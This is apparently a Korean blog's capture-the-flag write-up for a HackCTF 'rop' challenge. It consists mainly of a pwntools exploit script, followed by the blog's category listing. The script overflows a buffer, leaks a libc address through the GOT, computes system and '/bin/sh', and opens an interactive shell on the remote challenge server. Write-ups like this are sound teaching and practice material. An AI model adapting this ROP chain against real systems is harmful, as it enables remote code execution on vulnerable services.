Exploit Code

from pwn import *
#p=process('./rop')
p=remote('ctf.j0n9hyun.xyz', 3021)

#libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('./libc.so.6')
read_offset = libc.symbols['read']
system_offset = libc.symbols['system']
binsh_offset = libc.search("/bin/sh").next()

read_got = 0x804a00c
write_plt = 0x8048340
main = 0x8048470
pppr = 0x8048509

payload = 'A'*0x8c
payload += p32(write_plt)+p32(pppr)+p32(1)+p32(read_got)+p32(4)
payload += p32(main)

p.send(payload)
read = u32(p.recv(4))
libc_base = read - read_offset
log.info("libc base addr : "+hex(libc_base))
system = system_offset + libc_base
binsh = binsh_offset + libc_base

payload = 'A'*0x8c
payload += p32(system)+'AAAA'+p32(binsh)
p.send(payload)

p.interactive()

Capture the Flag

image

'Writeup [pwn] > HackCTF' 카테고리의 다른 글

World Best Encryption Tool  (0) 2020.03.07
Unexploitable #1  (0) 2020.03.07
RTL_Core  (0) 2020.03.07
Beginner_Heap  (0) 2020.03.07
babyheap  (0) 2020.03.07

+ Recent posts

티스토리툴바